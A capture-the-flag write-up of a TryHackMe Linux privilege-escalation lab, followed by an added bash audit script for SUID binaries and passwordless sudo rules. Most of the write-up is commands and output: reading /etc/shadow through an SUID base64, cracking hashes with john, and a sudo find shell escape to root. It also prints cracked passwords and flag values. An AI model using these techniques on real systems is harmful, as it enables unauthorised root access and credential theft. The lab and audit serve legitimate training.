aldern00b

THM - Linux Privilege Escalation: Capstone Challenge

OK, time to prove our worth after taking the entire Jr. Penetration Tester course. Here we're going to test our privilege-escalation skills.

First things first: we're already SSH'd in as Leonard, so we should start with a check on our sudo privileges.


[leonard@ip-10-10-110-108 ~]$ sudo -l

<snip...>

Sorry, user leonard may not run sudo on ip-10-10-110-108.

OK, let's step through the course. Next step: SUID bits.

[leonard@ip-10-10-110-108 ~]$ find / -type f -perm -04000 -ls 2>/dev/null 
/usr/bin/base64 <-- gives SUDO, SUID

<snip...>

/usr/bin/mount <-- gives SUDO
/usr/bin/crontab <-- gives COMMAND, SUDO
/usr/bin/pkexec <-- gives SUDO
/usr/bin/at <-- gives SHELL, COMMAND, SUDO

<snip...>

We'll visit GTFOBins and check each one until we find one with an SUID technique. We tried a few here, but we'll play with base64, as it's the only one of these that GTFOBins lists an SUID entry for. Its file-read technique uses the SUID binary to encode the file and a normal base64 to decode it back:

LFILE=/etc/shadow
/usr/bin/base64 "$LFILE" | base64 --decode

Bingo. We got the shadow file, and /etc/passwd is readable by everyone, so we just need to save these to two different files, unshadow them and let john do some crackin' for us.

unshadow passwd.txt shadow.txt > passwords.txt

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (missy)    
Penny123         (leonard)  

And there we go. We got missy's password! We can su to that user now and read her flag.

cat /home/missy/Documents/flag1.txt
THM-42828719920544

Checking sudo permissions as missy tells us she's allowed to run find with sudo, and without a password:

$ sudo -l
Matching Defaults entries for missy on ip-10-10-170-36:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY
    HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-170-36:
    (ALL) NOPASSWD: /usr/bin/find

GTFOBins says we can grab an elevated shell with this:

sudo find . -exec /bin/sh \; -quit

We run the command and find the flag:

$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# cd /home/rootflag/
sh-4.2# ls -la
total 4
drwx------. 2 root root 23 Jun  7  2021 .
drwxr-xr-x. 5 root root 50 Jun  7  2021 ..
-rw-r--r--. 1 root root 20 Jun  7  2021 flag2.txt
sh-4.2# cat flag2.txt
THM-168824782390238
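From the defender's side, the two findings on this box (an SUID bit on base64 that nothing needs, and a NOPASSWD sudo rule for find) are exactly what a periodic host audit should flag. The script below is an added example, not part of the original writeup: the SUID list and sudo -l lines are constructed from the output above, the "approved" SUID baseline is assumed, and the function names are hypothetical.

```bash
# Added defender-side audit, not from the writeup. Inputs are constructed
# from the output shown above; SUID_BASELINE is an assumed approved list.

# Constructed: paths that `find / -type f -perm -04000` reported on the box.
SUID_FOUND='/usr/bin/base64
/usr/bin/mount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at'

# Assumed baseline: binaries expected to carry the SUID bit on this image.
SUID_BASELINE='/usr/bin/mount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at'

# Constructed: the relevant lines of `sudo -l` for missy.
SUDO_L='User missy may run the following commands on ip-10-10-170-36:
    (ALL) NOPASSWD: /usr/bin/find'

# Print each found SUID path that is absent from the baseline, one per line.
unexpected_suid() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$2" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Print the command of every "(...) NOPASSWD: <cmd>" rule in sudo -l output.
nopasswd_rules() {
    printf '%s\n' "$1" | sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p'
}

# For each unexpected SUID binary, emit the command that clears the bit
# (printed for review, never executed here).
suid_remediation() {
    unexpected_suid "$1" "$2" | sed 's/^/chmod u-s /'
}

echo "SUID binaries not in baseline:"
unexpected_suid "$SUID_FOUND" "$SUID_BASELINE"
echo "Suggested remediation (review before running):"
suid_remediation "$SUID_FOUND" "$SUID_BASELINE"
echo "Passwordless sudo rules to review:"
nopasswd_rules "$SUDO_L"
```

On a live host you would feed `unexpected_suid` the real find output and `nopasswd_rules` the real `sudo -l -U <user>` output instead of the constructed strings.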
